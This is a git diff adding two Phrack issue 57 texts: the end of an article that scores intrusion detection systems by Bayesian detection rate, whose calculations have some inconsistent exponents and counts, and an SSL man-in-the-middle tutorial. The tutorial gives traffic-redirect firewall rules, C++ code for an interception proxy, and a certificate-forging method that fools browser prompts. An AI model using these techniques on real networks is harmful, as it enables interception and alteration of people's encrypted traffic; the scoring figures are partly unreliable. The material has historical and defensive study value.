+BDR =  ------------------------------------------------------------- = 0.6757
+        (2.5 * 10^-4) * (5.0^-10) + (9.9975 * 10^-1) * (6.0 * 10^-5)
+
+
+----|Network Flight Recorder 
+
+False positives - 5
+False Negatives - 1
+True  Positives - 3
+
+
+
+                 1
+P(Ii) = -------------------- = 2.5 * 10^-4 
+               1*10^5
+	      --------
+	        1*4
+
+P(Ij) = 1 - P(Ii) = 0.99975
+
+P(Ai|Ii) = 3/4 = 0.75
+
+P(Ai|Ij) = 5/99996 = 5.0 * 10^-5
+
+
+                       (2.5 * 10^-4) * (7.5^-10) 	                
+BDR =  ------------------------------------------------------------- = 0.7895
+        (2.5 * 10^-4) * (7.5^-10) + (9.9975 * 10^-1) * (5.0 * 10^-5)
+
+
+----|Cisco NetRanger
+
+
+False positives - 5
+False Negatives - 3
+True  Positives - 1
+
+
+                 1
+P(Ii) = -------------------- = 2.5 * 10^-4 
+               1*10^5
+	      --------
+	        1*4
+
+P(Ij) = 1 - P(Ii) = 0.99975
+
+P(Ai|Ii) = 1/4 = 0.25
+
+P(Ai|Ij) = 5/99996 = 5.0 * 10^-5
+
+
+                       (2.5 * 10^-4) * (2.5^-10) 	                
+BDR =  ------------------------------------------------------------- = 0.5556
+        (2.5 * 10^-4) * (2.5^-10) + (9.9975 * 10^-1) * (5.0 * 10^-5)
+
+
+----|EMERALD
+
+False positives - 7
+False Negatives - 3
+True  Positives - 1
+
+
+
+                 1
+P(Ii) = -------------------- = 2.5 * 10^-4 
+               1*10^5
+	      --------
+	        1*4
+
+P(Ij) = 1 - P(Ii) = 0.99975
+
+P(Ai|Ii) = 1/4 = 0.25
+
+P(Ai|Ij) = 7/99996 = 7.0 * 10^-5
+
+
+                       (2.5 * 10^-4) * (2.5^-10) 	                
+BDR =  ------------------------------------------------------------ = 0.4718
+        (2.5 * 10^-4) * (2.5^-10) + (9.9975 * 10^-1) * (7.0 * 10^-5)
+
+
+----|CyberCop
+
+
+False positives - 4
+False Negatives - 2
+True  Positives - 2
+
+
+
+                 1
+P(Ii) = -------------------- = 2.5 * 10^-4 
+               1*10^5
+	      --------
+	        1*4
+
+P(Ij) = 1 - P(Ii) = 0.99975
+
+P(Ai|Ii) = 2/4 = 0.50
+
+P(Ai|Ij) = 4/99996 = 4.0 * 10^-5
+
+
+                       (2.5 * 10^-4) * (5.0^-10) 	                
+BDR =  ------------------------------------------------------------ = 0.7576
+        (2.5 * 10^-4) * (5.0^-10) + (9.9975 * 10^-1) * (4.0 * 10^-5)
+
+
+----|PENS Dragon Intrusion Detection System
+
+False positives - 6
+False Negatives - 2
+True  Positives - 2
+
+
+
+                 1
+P(Ii) = -------------------- = 2.5 * 10^-4 
+               1*10^5
+	      --------
+	        1*4
+
+P(Ij) = 1 - P(Ii) = 0.99975
+
+P(Ai|Ii) = 2/4 = 0.50
+
+P(Ai|Ij) = 6/99996 = 6.0 * 10^-5
+
+
+                       (2.5 * 10^-4) * (5.0^-10) 	                
+BDR =  ------------------------------------------------------------- = 0.6757
+        (2.5 * 10^-4) * (5.0^-10) + (9.9975 * 10^-1) * (6.0 * 10^-5)
+
+
+----|Network ICE
+
+False positives - 5
+False Negatives - 3
+True  Positives - 1
+
+
+
+                 1
+P(Ii) = -------------------- = 2.5 * 10^-4 
+               1*10^5
+	      --------
+	        1*4
+
+P(Ij) = 1 - P(Ii) = 0.99975
+
+P(Ai|Ii) = 1/4 = 0.25
+
+P(Ai|Ij) = 5/99996 = 5.0 * 10^-5
+
+
+                       (2.5 * 10^-4) * (2.5^-10) 	                
+BDR =  ------------------------------------------------------------- = 0.5556
+        (2.5 * 10^-4) * (2.5^-10) + (9.9975 * 10^-1) * (5.0 * 10^-5)
+
+
+----|Shadow
+
+False positives - 3
+False Negatives - 2
+True  Positives - 2
+
+
+
+                 1
+P(Ii) = -------------------- = 2.5 * 10^-4 
+               1*10^5
+	      --------
+	        1*4
+
+P(Ij) = 1 - P(Ii) = 0.99975
+
+P(Ai|Ii) = 2/4 = 0.50
+
+P(Ai|Ij) = 3/99996 = 3.0 * 10^-5
+
+
+                       (2.5 * 10^-4) * (5.0^-10) 	                
+BDR =  ------------------------------------------------------------- = 0.8065
+        (2.5 * 10^-4) * (5.0^-10) + (9.9975 * 10^-1) * (3.0 * 10^-5)
+
+
+----|MPP NIDS Prototype
+
+False positives - 2
+False Negatives - 1
+True  Positives - 3
+
+
+
+                 1
+P(Ii) = -------------------- = 2.5 * 10^-4
+               1*10^5
+	      --------
+	        1*4
+
+P(Ij) = 1 - P(Ii) = 0.99975
+
+P(Ai|Ii) = 3/4 = 0.75
+
+P(Ai|Ij) = 2/99996 = 2.0 * 10^-5
+
+
+                       (2.5 * 10^-4) * (7.5^-10) 	                
+BDR =  ------------------------------------------------------------- = 0.9036
+        (2.5 * 10^-4) * (7.5^-10) + (9.9975 * 10^-1) * (2.0 * 10^-5)
+
+
+
+4.2 -------|Normal Distribution
+
+	Using the normal distribuiton method let us identify, for a scale from
+1 to 10, what's the score of our NIDS Prototype:
+
+
+---|The Average BDR for NIDS test was:
+
+
+          0.4718+0.7143+0.6757+0.7895+0.5556+0.4718+...+0.8065+0.9036
+m(BDR) = -------------------------------------------------------------
+				     11
+
+m(BDR) =  0.6707
+
+
+---|The Standard Deviation for NIDS test was:
+
+	    (0.4718 - 0.6707)^2+(0.7143 - 0.6707)^2+...+(0.9036 - 0.6707)^2 	
+s(BDR)^2 = ----------------------------------------------------------------
+					11
+
+s(BDR) = 0.1420
+
+---|The Score
+
+	The mean is 67.07(m) and the standard deviation is 14.2(s). Since 
+90.36(X) is 23.29 points above the mean (X - m = 23.29) and since a standard 
+deviation is 14.2 points,there is a distance of 1.640(z) standard deviations 
+between the 67.07 and 90.36 (z=[23.29/14.2]) plus 0,005 for rounds and  
+5.0 for our average standard score. The score (z) can be computed using the 
+following formula:
+
+	                             X - m
+	                        Z = -------- 
+                                       s
+	
+	If you get a positive number for Z  then  apply (z = z + 0.005 + 5.0)
+	If you get a negative number for Z  then  apply (z = z - 0.005 + 5.0)
+		
+	You should consider just the two first decimal places:
+	
+	So for our prototype we'll get:
+	z = 1.640 + 0.005 + 5.0
+	z = 6.64
+	
+	Our prototype scored 6.64 in our test, at this point the reader is 
+encouraged to make the same calculation for all NIDS, you'll see that our 
+prototype achieved the best score of all NIDS we tested.
+
+
+6 -------|Why?
+
+
+	Why our prototype differs so much from the rest of the NIDS, if it
+was built under almost the same concepts?
+	
+6.1 ---|E,A,D,R AND "C" Boxes
+	
+	Using the CIDF (Common Intrusion Detection Framework) we have 4 basic
+boxes, which are:
+
+	E - Boxes, or event generators, are the sensors; Their Job is to 
+detect events and push out the reports.
+	A - Boxes receive reports and do analysis. They might offer a 
+prescription and recommend a course of action.
+	D - Boxes are database components; They can determine wheter an 
+IP address or an attack has been seen before, and they can do trend analysis
+	R - Boxes can take the input of the E, A and D Boxes and Respond to 
+the event
+
+	Now what are the "C" - Boxes? They are Redundancy Check boxes, 
+they use CRC methods to check if a True Positive is really a True Positive or 
+not. 
+	The C-Boxes can tell If an E - Box generates a rightful report or an 
+A - Box generates a real true positive based on that report.
+	Because we're dealing with a MPP Enviroment this node can be at all 
+machines dividing the payload data by as much as boxes you have.
+
+6.2 ---|CISL
+
+
+   	Our prototype Boxes use a language called CISL (Common Intrusion 
+Specification Language) to talk with one another and it convey the following 
+kinds of information:
+       +Raw event information: Audit Trail Records and Network Traffic
+       +Analysis Results: Description of System Anomalies and Detected Attacks
+       +Response Prescriptions: Halt Particular Activities or modify 
+	component security specifications
+	
+
+6.3 ---|Transparent NIDS Boxes
+
+	All but some E-Boxes will use a method comonly applied to firewalls 
+and proxies to control in/out network traffic to certain machines. It's Called
+"Box Transparency", it reduces the needs for software replacement and user
+retain.
+	It can control who or what is able to see the machine so all
+unecessary network traffic will be reduced by a minimum.
+
+6.4 ---|Payload Distribution And E-Box to A-Box Tunneling
+
+	Under MPI (Message Passing Interface) programming environment, using
+Beowulf as Cluster Plataform, we can distribute network payload traffic
+parsing of A - Boxes every machine in the cluster, maximizing the A - Box 
+perfomance and C - Box as well. 
+	All other network traffic than the report data that come from E-Boxes
+by a encrypted tunneling protocol, is blocked in order to maximize the cluster 
+data transfer and the DSM (Distributed Shared Memory).
+
+
+ 
+7 -------|Conclusions
+
+	Altough Neither Attack Method nor the NIDS Detection Model were
+considered on this paper, it's necessary to add that no one stays with a NIDS 
+with their default configuration, so you can achieve best scores with your
+well configured system. 
+	You can also score any NIDS scope with this method and it gives
+you a glimpse of how your system is doing in comparison with others.   
+	Like it was said at the introduction topic, this paper is not a final 
+solution for NIDS performance mesurement or a real panacea to false positive
+rates (doubtfully any paper will be), but it gives the reader a relative easy
+way to measure yours NIDS enviroment effectivess and it proposes one 
+more way to perform this hard job.
+		
+
+8 -------|Bibliography
+
+AMOROSO, Edward G. (1999), "Intrusion Detection", Intrusion NetBook, USA.
+
+AXELSON, Stefan (1999) - "The Base-Rate Fallacy and its Implications for 
+	the Difficulty of Intrusion Detection", 
+	www.ce.chalmers.se/staff/sax/difficulty.ps, Sweden. 
+
+BUNDY, Alan (1997), "Artificial Inteligence Techniques", Springer-Verlag 
+	Berlin Heidelberg, Germany.   
+
+BUYYA, Rajkumar (1999), "High Performance Cluster Computing: Architectures 
+	and Systems", Prentice Hall, USA.
+
+KAEO, Merike (1999), "Designing Network Security", Macmillan Technical 
+	Publishing, USA.
+
+LEORNARD, Thomas (1999), "Bayesian Methods: An Analysis for Statisticians 
+	and Interdisciplinary Researchers", Cambridge Univ Press, UK.
+
+NORTHCUTT, Stephen (1999), "Network Intrusion Detection: An Analyst's 
+	Handbook", New Riders Publishing, USA.
+
+PATEL, Jagdish K. (1996), "Handbook of the Normal Distribution", 
+	Marcel Dekker, USA.
+
+STERLING, Thomas L. (1999), "How to Build a Beowulf: A Guide to 
+	the Implementation and Application of PC Clusters", MIT Press, USA. 
+
+
+9 -------|Acknowlegments:
+
+	#Segfault at IRCSNET, Thanks for all fun and moral support
+
+	TICK, for the great hints on NIDS field and beign the first 
+	one to believe on this paper potential
+
+	VAX, great pal, for all those sleepless nights
+
+	Very Special Thanks to GAMMA, for the great Text & Math hints
+
+	SYD, for moral support and great jokes 
+
+	All THC crew
+	
+	Michal Zalewski, dziekuje tobie za ostatnia noc
+
+	My Girlfriend Carolina, you all Know why :)
+	
+	Storm Security Staff, for building the experimental environment
+	
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/13.txt b/phrack57/13.txt
new file mode 100644
index 0000000..8bf11a1
--- /dev/null
+++ b/phrack57/13.txt
@@ -0,0 +1,536 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x0d of 0x12
+
+|=---=[ Haaaang on snoopy, snoopy hang on. (SSL for fun and profit) ]=---=|
+|=-----------------------------------------------------------------------=|
+|=------------------=[ Stealth <stealth@segfault.net> ]=-----------------=|
+
+
+Introduction
+------------
+
+SSL in version 3 known as SSLv3 or current version 3.1 also known
+as TLS provides a mechanism to securely transfer data over a network
+with recognition of modified or re-played packets. It has all requirements a
+secure system needs for, lets say, managing your bankaccounts.
+
+I'll show that in practise this is not true.
+
+In that article I will guide you through the parts
+of SSL which are important for us and necessary to know.
+Things we do not play with such as the SSL handshake are not
+explained in depth; take a look to the references
+if you are interested.
+
+
+1. Why SSL
+----------
+
+SSL was designed to provide:
+
+    1.) Confidentiality
+
+    This is reached by encrypting the data that is passed over the
+    network with a symetric algorithm choosen
+    during SSL handshake. SSL uses variable amount of ciphers,
+    assumed to be non-breakable. If a new attack shows up against
+    a specific algorithm, this does not hurt SSL much,
+    it just chooses a different one.
+
+
+    2.) Message Integrity
+
+    SSL is using a strong Message Authentication Code
+    (MAC) such as SHA-1 which is appended to the end of the packet
+    that contains the data and encrypted along with the payload.
+    That way SSL detects when the payload is tampered with, since the
+    computed hashes will not match. The MAC is also used to protect the
+    handshake from tampering.
+
+    2.1.) Protection against replay-attacks
+
+    SSL is using seqence-numbers to protect the communicating parties from
+    attackers who are recording and replaying packets. The sequence-number
+    is encrypted as the payload is. During handshake a 'random' is used
+    to make the handshake unique and replay attacks impossible.
+
+    2.2.) Protection against reorder-attacks
+
+    As in 2.1.) the seqence-numbers also forbid to record packets and send
+    them in a different order.
+
+
+    3.) Endpoint Authentication
+
+    With X509 (currently version 3) certificates SSL supports authentication
+    of clients and servers. Authentication of servers is what you want
+    when using https with your bank, but this is where we take a deeper look.
+
+
+This sounds pretty secure. However using the program that is explained until
+the end of this article, neither of the points is true any longer (except
+we cannot break client-authentication).
+
+At the end we are able to watch at the plain data, modifying it at our needs,
+recording it, sending it delayed, in wrong order or duplicated.
+This will basicly be done via a man in the middle attack where several
+weaknesses in interactive SSL-clients are exploited, "give it to the user"
+in particular.
+
+
+2. X509 certificates
+--------------------
+
+X509 certificates are integral part of SSL. The server sends his cert
+to the client during SSL handshake.
+A X509 cert contains the distinguished name (DN) of the issuer
+the DN of the subject, a version and serialnumber, algorithms choosen,
+a timeframe where the key is valid and ofcorse the public key of the subject.
+
+The subject is the (distinguished) name of the entity that the public key
+in this cert belongs to. Unfortunally in plain X509 certs there is no
+field that is labeled "DNS-name" so that you can match it against the URL
+you are viewing for instance. Usually the CN field is what is mapped to
+the DNS name but this is just a convention which both (client and entity
+offering its cert) must be aware of.
+"Issuer" is the (distinguished) name of the entity that signed this cert
+with its private key. It is called a Certificate Authority -- CA.
+
+Lets view a X509 cert:
+
+stealth@lydia:sslmim> ./cf segfault.net 443|openssl x509 -text
+Certificate:
+    Data:
+        Version: 1 (0x0)
+        Serial Number: 1 (0x1)
+        Signature Algorithm: md5WithRSAEncryption
+        Issuer: C=EU, ST=segfault, L=segfault,
+                O=www.segfault.net/Email=crew@segfault.net
+        Validity
+            Not Before: Nov 19 01:57:27 2000 GMT
+            Not After : Apr  5 01:57:27 2028 GMT
+        Subject: C=EU, ST=segfault, L=segfault, O=www.segfault.net,
+                 CN=www.segfault.net/Email=crew@segfault.net
+        Subject Public Key Info:
+            Public Key Algorithm: rsaEncryption
+            RSA Public Key: (1024 bit)
+                Modulus (1024 bit):
+                    00:cd:64:2a:97:26:7a:9b:5c:52:5e:9c:9e:b3:a2:
+                    e5:f5:0f:99:08:57:1b:68:3c:dd:22:36:c9:01:05:
+                    e1:e5:a4:40:5e:91:35:8e:da:8f:69:a5:62:cf:cd:
+                    70:dc:ca:d2:d7:92:03:5c:39:2a:6d:02:68:91:b9:
+                    0d:d1:2c:c7:88:cb:ad:be:cc:e2:fa:03:55:a1:25:
+                    47:15:35:8c:d9:78:ef:9f:6a:f6:5f:e6:9a:02:12:
+                    a3:c2:b8:6a:32:0f:1d:9d:7b:2f:65:90:4e:ca:f7:
+                    a0:e4:ae:55:91:09:e4:6e:01:e3:d1:71:1e:60:b1:
+                    83:88:8f:c4:6a:8c:bb:26:fd
+                Exponent: 65537 (0x10001)
+    Signature Algorithm: md5WithRSAEncryption
+        7d:c7:43:c3:71:02:c8:2f:8c:76:9c:f3:45:4c:cf:6d:21:5d:
+        e3:8f:af:8f:e0:2e:3a:c8:53:36:6b:cf:f6:27:01:f0:ed:ee:
+        42:78:20:3d:7f:e3:55:1f:8e:f2:a0:8e:1a:1b:e0:76:ad:3e:
+        a0:fc:5b:ce:a6:c4:32:7b:64:f2:a4:0f:a3:be:a1:0e:a7:ca:
+        ed:67:39:07:65:6b:cc:e7:5a:9a:b0:3a:f3:5c:1a:18:d4:dd:
+        8c:8d:5a:9e:a0:63:e0:7d:af:7c:97:7c:89:17:0f:25:2f:a7:
+        80:d3:02:dc:88:7a:12:64:ec:8a:ff:e4:62:92:2e:7f:75:03:
+        82:f1
+
+
+Important line is
+
+Issuer: C=EU, ST=segfault, L=segfault,
+        O=www.segfault.net/Email=crew@segfault.net
+
+Where C, ST, L, O and Email (so called relative DNs -- RDN) build the issuer
+DN.
+
+Same for the subject:
+
+Subject: C=EU, ST=segfault, L=segfault, O=www.segfault.net,
+         CN=www.segfault.net/Email=crew@segfault.net
+
+Certs may be be signed by a public known CA where the subject has
+no control over the private key used for that purpose, or by the
+subject itself -- so called self-signed cert.
+
+In this example, the cert is signed by a own CA.
+
+By the way, this is the original segfault.net certificate,
+noone was intercepting communication while fetching it.
+We will later see how it looks like when someone is playing
+with the connection.
+This certificate is exchanged during SSL handshake when you
+point netscape browser to https://segfault.net. The public key contained
+in this cert is then used for session encryption.
+
+To have a pretty good level of security, certs should be signed
+by a (either your own, as in this example, or a public) CA
+where the client has the public key handy to check this cert.
+If the client does not have the public key from the CA to check the
+integrity of the cert, it prompts the user to accept/deny it.
+This "requirement" for interactive clients and the fact that
+there are so many "well-surfed" sites which provide certs where nobody
+has the key for proper checking by default will in last consequence
+make SSL obsolete for common interactive SSL clients, i.e. Netscape
+browser.
+
+
+3. Getting in between
+---------------------
+
+As seen, X509-certificates are an important part of SSL. Its task is
+to prove to the client that he is talking to the server he is expecting,
+and that he is using the apropriate key while doing so.
+
+Now, imagine what could be done when we could fake such a certificate,
+and transparently forward a SSL connection.
+
+Got it? Its worth a try. Our leading motto 'teile und herrsche' shows
+that there are two problems which we must solve.
+
+a) Hijacking the connection to be able to transparently forward it.
+b) Faking certificates to the client, so that he always sees the certs
+   he is expecting and taking us for the real server.
+
+
+a+b are usually called a 'man in the middle' attack.
+X509 certs should make this impossible but common cert-checking
+implementations such as Netscape browser (and in general, interactive
+clients) hardly get it.
+
+First problem is pretty easy to solve. Given that we sit physically
+between the two parties, we just use our firewall skills (preferably on
+Linux or BSD :) to redirect, lets say https-traffic to our program
+called 'mimd'. This would probably look like
+
+# ipchains -A input -s 0/0 -d 0/0 443 -j REDIRECT 10000 -p tcp
+
+or similar to grab the https-traffic on the input chain.
+For local mimd action on a 2.4 kernel box you'd type
+
+# iptables -t nat -A OUTPUT -p tcp --sport 1000:3000 --dport 443\
+  -j REDIRECT --to-port 10000
+
+Given the (expected) source-ports from the SSL-client. If we ommit that,
+mimd will enter an infinite loop (iptables would redirect already redirected
+traffic). Since mimd binds to port 8888 and up it does not match the rule.
+You do not need to sit physically between the parties,
+it is usually enough to be in the LAN of the server or
+the LAN of the client. ARP-tricks do the job pretty well
+then, the FW-rules will not even change.
+
+With these redirect-rules we could already set up a simple bouncer
+with a tiny select() loop. The target-address can be found using
+the operating system API (usually via getsockopt() or alike,
+I compiled NS_Socket::dstaddr() function for the most important OSes :)
+Using our little bouncer, we can not see what is passed on the link,
+since we do not involve SSL itself.
+
+To be able to see plain traffic, we should modify our (virtual)
+little bouncer with a SSL_accpet() and a SSL_connect() statement.
+After accpet()ing the connection we would connect() to the real
+target and issue a call to SSL_connect(). Done that, we invoke
+SSL_accept(). Assuming we had done the initialization stuff before
+such as loading the key-file etc. the SSL-client will now prompt
+the bouncer-cert to the user.
+Obviously for him that this is faked, because when he surfes
+company-A and gets cert for company-B or 'MiM' he is probably a little
+bit confused.
+We will solve that problem. Our calls to SSL_connect() and
+SSL_accept() are already in the right order, and I will now
+explain why.
+
+
+4. DCA
+------
+
+We can already see the plain text of the connection via SSL_read()
+and forward it to the target via SSL_write() if the user
+on the SSL-client just accepts the certificate. 
+It is now time to solve the second part-problem: faking
+the certificate.
+
+Remember, we first issued SSL_connect(), before we do
+the SSL_accept(), so the server sees us as a legitimate
+client when doing SSL_connect() and does the SSL handshake.
+As a result we have the server certificate.
+
+Lets see what we have so far:
+
+...
+
+// block for incoming connections
+while ((afd = accept(sfd, (sockaddr*)&from, &socksize)) >= 0) {
+
+	// Get real destination
+	// of connection
+        if (NS_Socket::dstaddr(afd, &dst) < 0) {
+        	log(NS_Socket::why());
+                die(NULL);
+        }
+
+	...
+
+	++i;
+	if (fork() == 0) {
+				
+		// --- client-side
+		if ((sfd2 = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
+			log("main::socket");
+			die(NULL);
+		}
+
+			
+		if (NS_Socket::bind_local(sfd2, 8888+i, 0) < 0) {
+			log(NS_Socket::why());
+			die(NULL);
+		}
+			
+	
+		// fire up connection to real server
+		if (connect(sfd2, (struct sockaddr*)&dst, 
+		    sizeof(dst)) < 0) {
+			log("main::connect");
+			die(NULL);
+		}
+
+		...
+			
+		client->start();
+		client->fileno(sfd2);	// this socket to use
+			
+		// do SSL handshake
+		if (client->connect() < 0) {
+			log("Clientside handshake failed. Aborting.");
+			die(NULL);
+		}
+
+The handshake with the real server is finished right *now*.
+Take this as some sort of SSL-pseudocode, the use of SSL_connect()
+and SSL_accept() is encapsulated into client and server objects respectively.
+Now we can prepare ourself to be a server for the SSL-client:	
+	
+
+		// --- server-side
+
+		server->start();	// create SSL object
+		server->fileno(afd);	// set socket to use
+
+Not calling SSL_accept() until we actually do the fake:
+			
+		if (enable_dca)
+			NS_DCA::do_dca(client, server);
+
+Dynamic Certificate Assembly (DCA) does the following:
+
+Given an almost empty certificate (all RDN are non-existant
+except C -- Country) the do_dca() fills this X509 cert with the contents
+of the X509 certificate obtained during SSL-handshake with the
+server before. We rip the L, ST, O, CN, the OU and the Email field
+(as present) and place it into our certificate which we will show
+to the SSL-client. This is done using some ugly string-parsing, and
+using X509_() functions offered by OpenSSL.
+For the OU field in the issuer we append a space " " which will not show up
+in the window of the SSL-client but makes it differ from
+the saved certs from public CA's. The user will be prompted to
+accept a cert from a "well known CA" (because user sees the name,
+but not the appended space, SSL-client can not find apropriate
+public key for this CA and prompts), which he will probably accept.
+
+Nice eh? As a special gift, we can use the subject fields (CN,...) for the
+issuer-fields so the former public CA signed X509-cert becomes
+self-signed! Since self-signed certificates are usually shown to the user
+he cant know it is a fake!
+Assembled the cert, lets just show it to the client:
+
+
+        // do SSL handshake as fake-server
+        if (server->accept() < 0) {
+	        log("Serverside handshake failed. Aborting.");
+	        die(NULL);
+        }
+
+        ssl_forward(client, server);
+
+
+Done. ssl_forward() just calls SSL_read/SSL_write in a loop and records
+the plain data. We could also modify the stream, replaying or supressing
+it -- as we wish.
+
+Lets fetch a X509-cert from a https-server via cf when mimd is active:
+
+[starting mimd somewhere, maybe on localhost]
+
+stealth@lydia:sslmim> ./cf segfault.net 443|openssl x509 -text
+Certificate:
+    Data:
+        Version: 3 (0x2)
+        Serial Number: 1 (0x1)
+        Signature Algorithm: md5WithRSAEncryption
+        Issuer: C=US, C=EU, ST=segfault, L=segfault,
+                O=www.segfault.net, OU= /Email=crew@segfault.net
+        Validity
+            Not Before: Mar 20 13:42:12 2001 GMT
+            Not After : Mar 20 13:42:12 2002 GMT
+        Subject: C=US, C=EU, ST=segfault, L=segfault, O=www.segfault.net,
+                 CN=www.segfault.net/Email=crew@segfault.net
+        Subject Public Key Info:
+            Public Key Algorithm: rsaEncryption
+            RSA Public Key: (1024 bit)
+                Modulus (1024 bit):
+                    00:d4:4f:57:29:2c:a0:5d:2d:af:ea:09:d6:75:a3:
+                    e5:b6:db:41:d7:7f:b7:da:52:af:d1:a7:b8:bb:51:
+                    94:75:8d:d4:c4:88:3f:bf:94:b1:a9:9a:f8:55:aa:
+                    0d:11:d6:8f:8c:8b:5b:b5:db:03:18:7e:7a:d7:3b:
+                    b0:24:a9:d6:ba:9a:a7:bb:9b:ba:78:50:65:4b:21:
+                    94:6f:83:d4:de:16:e4:8b:03:f2:97:f0:0b:9b:55:
+                    ed:aa:d2:c3:ee:66:55:10:ba:59:4d:f0:9d:4e:d4:
+                    b5:52:ff:8c:d9:75:c2:ae:49:be:63:57:b9:48:36:
+                    ca:c2:07:9d:ba:32:ff:d6:e7
+                Exponent: 65537 (0x10001)
+        X509v3 extensions:
+            X509v3 Subject Key Identifier:
+                4A:2C:50:3A:50:4E:96:3D:E6:C7:4E:E8:C2:DF:41:F0:0A:26:F0:DD
+            X509v3 Authority Key Identifier:
+                keyid:4A:2C:50:3A:50:4E:96:3D:E6:C7:4E:E8:C2:DF:41:F0:0A:26:F0:DD
+                DirName:/C=US
+                serial:00
+
+            X509v3 Basic Constraints:
+                CA:TRUE
+    Signature Algorithm: md5WithRSAEncryption
+        b7:7d:5a:c7:73:19:66:aa:89:25:7c:f6:bc:fd:7d:82:1a:d0:
+        ac:76:93:72:db:2d:f6:3b:e0:88:5f:1d:6e:7c:25:d7:a2:de:
+        86:28:38:90:cf:fe:38:a0:1f:67:87:37:8b:2c:f8:65:57:de:
+        d1:4c:67:55:af:ca:4c:ae:7b:13:f2:6f:b6:64:f6:aa:7f:28:
+        8b:2f:21:07:8f:6d:7e:0c:3f:17:b1:69:3a:ea:c0:fb:a2:aa:
+        f9:d6:a6:05:6d:77:e1:e6:f0:12:a3:e6:ca:2a:73:33:f2:91:
+        e1:72:c8:83:84:48:fa:fe:98:6c:d4:5a:ab:98:b2:2e:3c:8a:
+        eb:f2
+
+
+As you can see, the public key differs to the one before (without mimd)
+because it is the mimd key itself. The C field contains "US" and "EU"
+where only the latter is shown in Netscape, so no difference.
+Aware of the " " in the OU field? Since the original cert did not
+contain a OU field, it now is just a " ". Does not matter.
+The issuer has been taken from original issuer-field in X509 cert.
+Now, lets try to take the subject-field for the issuer. Somewhat
+obsolete for this example because it is not signed by a public CA, but
+in case an important public CA signed the cert, a self-signed
+fake might be a nice toy:
+
+[restarting mimd, this time in the 'use-subject' way]
+
+stealth@lydia:sslmim> ./cf segfault.net 443|openssl x509 -text
+Certificate:
+    Data:
+        Version: 3 (0x2)
+        Serial Number: 1 (0x1)
+        Signature Algorithm: md5WithRSAEncryption
+        Issuer: C=US, C=EU, ST=segfault, L=segfault,
+                O=www.segfault.net, OU= , CN=www.segfault.net/Email=crew@segfault.net
+        Validity
+            Not Before: Mar 20 13:42:12 2001 GMT
+            Not After : Mar 20 13:42:12 2002 GMT
+        Subject: C=US, C=EU, ST=segfault, L=segfault, O=www.segfault.net,
+                 CN=www.segfault.net/Email=crew@segfault.net
+        Subject Public Key Info:
+            Public Key Algorithm: rsaEncryption
+            RSA Public Key: (1024 bit)
+                Modulus (1024 bit):
+                    00:d4:4f:57:29:2c:a0:5d:2d:af:ea:09:d6:75:a3:
+                    e5:b6:db:41:d7:7f:b7:da:52:af:d1:a7:b8:bb:51:
+                    94:75:8d:d4:c4:88:3f:bf:94:b1:a9:9a:f8:55:aa:
+                    0d:11:d6:8f:8c:8b:5b:b5:db:03:18:7e:7a:d7:3b:
+                    b0:24:a9:d6:ba:9a:a7:bb:9b:ba:78:50:65:4b:21:
+                    94:6f:83:d4:de:16:e4:8b:03:f2:97:f0:0b:9b:55:
+                    ed:aa:d2:c3:ee:66:55:10:ba:59:4d:f0:9d:4e:d4:
+                    b5:52:ff:8c:d9:75:c2:ae:49:be:63:57:b9:48:36:
+                    ca:c2:07:9d:ba:32:ff:d6:e7
+                Exponent: 65537 (0x10001)
+        X509v3 extensions:
+            X509v3 Subject Key Identifier:
+                4A:2C:50:3A:50:4E:96:3D:E6:C7:4E:E8:C2:DF:41:F0:0A:26:F0:DD
+            X509v3 Authority Key Identifier:
+                keyid:4A:2C:50:3A:50:4E:96:3D:E6:C7:4E:E8:C2:DF:41:F0:0A:26:F0:DD
+                DirName:/C=US
+                serial:00
+
+            X509v3 Basic Constraints:
+                CA:TRUE
+    Signature Algorithm: md5WithRSAEncryption
+        b7:7d:5a:c7:73:19:66:aa:89:25:7c:f6:bc:fd:7d:82:1a:d0:
+        ac:76:93:72:db:2d:f6:3b:e0:88:5f:1d:6e:7c:25:d7:a2:de:
+        86:28:38:90:cf:fe:38:a0:1f:67:87:37:8b:2c:f8:65:57:de:
+        d1:4c:67:55:af:ca:4c:ae:7b:13:f2:6f:b6:64:f6:aa:7f:28:
+        8b:2f:21:07:8f:6d:7e:0c:3f:17:b1:69:3a:ea:c0:fb:a2:aa:
+        f9:d6:a6:05:6d:77:e1:e6:f0:12:a3:e6:ca:2a:73:33:f2:91:
+        e1:72:c8:83:84:48:fa:fe:98:6c:d4:5a:ab:98:b2:2e:3c:8a:
+        eb:f2
+
+
+The only diff between these two is that a CN shows up in
+the issuer-field now which has not been there before.
+It would have more effect with public CA's as I already mentioned.
+
+
+5. Conclusion
+-------------
+
+To conclude: a user surfing the web with interactive
+client as they exist by now CAN NOT KNOW that his
+connection is subject to a mim attack. There is no
+way for him to distinguish between 'browser prompts
+because company uses unknown CA' or 'the unknown CA
+is mimd'. Even when he already surfed the site and saved
+the cert (!) he can fall into this trap. An attentive user
+MIGHT notice that he is prompted to accept a 'RSA Data Security'
+or a 'Verisign' signed cert and wonders. Enabling
+self-signing switch in mimd will kill his doubts.
+
+In this article I focused on the 'separate-ports' way to
+break SSL, there is also a thing called 'upward negotiation'
+which turns a former plain-text stream into a SSL stream
+via a keyword (STARTTLS for example). All things said about
+SSL apply to it as well, just you can not use mimd in this
+case, because you need to filter SSL connections and forward
+it to mimd. This will probably be done using MSG_PEEK; we
+are researching. :)
+
+
+
+Thanks to
+
+Segfault Consortium for providing a testing environment and
+various folks for proof-reading the article. Blame them
+if something is wrong. :)
+
+
+References:
+-----------
+
+[1] "SSL and TLS" Designing and Building Secure Systems
+    Eric Rescorla, AW 2001
+
+    A 'must-read' if you want/need to know how SSL works.
+
+[2] "Angewandte Kryptographie"
+    Bruce Schneier, AW 1996
+
+    THE book for crypto-geeks. I read the german version,
+    in english its 'Applied Cryptographie'
+
+[2] various openssl c-files and manpages
+
+[3] http://www.cs.uni-potsdam.de/homepages/students/linuxer/sslmim.tar.gz
+    A DCA implementation, described in this article;
+    also contains 'cf' tool.
+
+[4] In case you cannot try mimd on your local box, view
+    a snapshot from a mim-ed session provided by TESO:
+    http://www.team-teso.net/ssl-security.png
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/14.txt b/phrack57/14.txt
new file mode 100644
index 0000000..c2fc652
--- /dev/null
+++ b/phrack57/14.txt
@@ -0,0 +1,687 @@
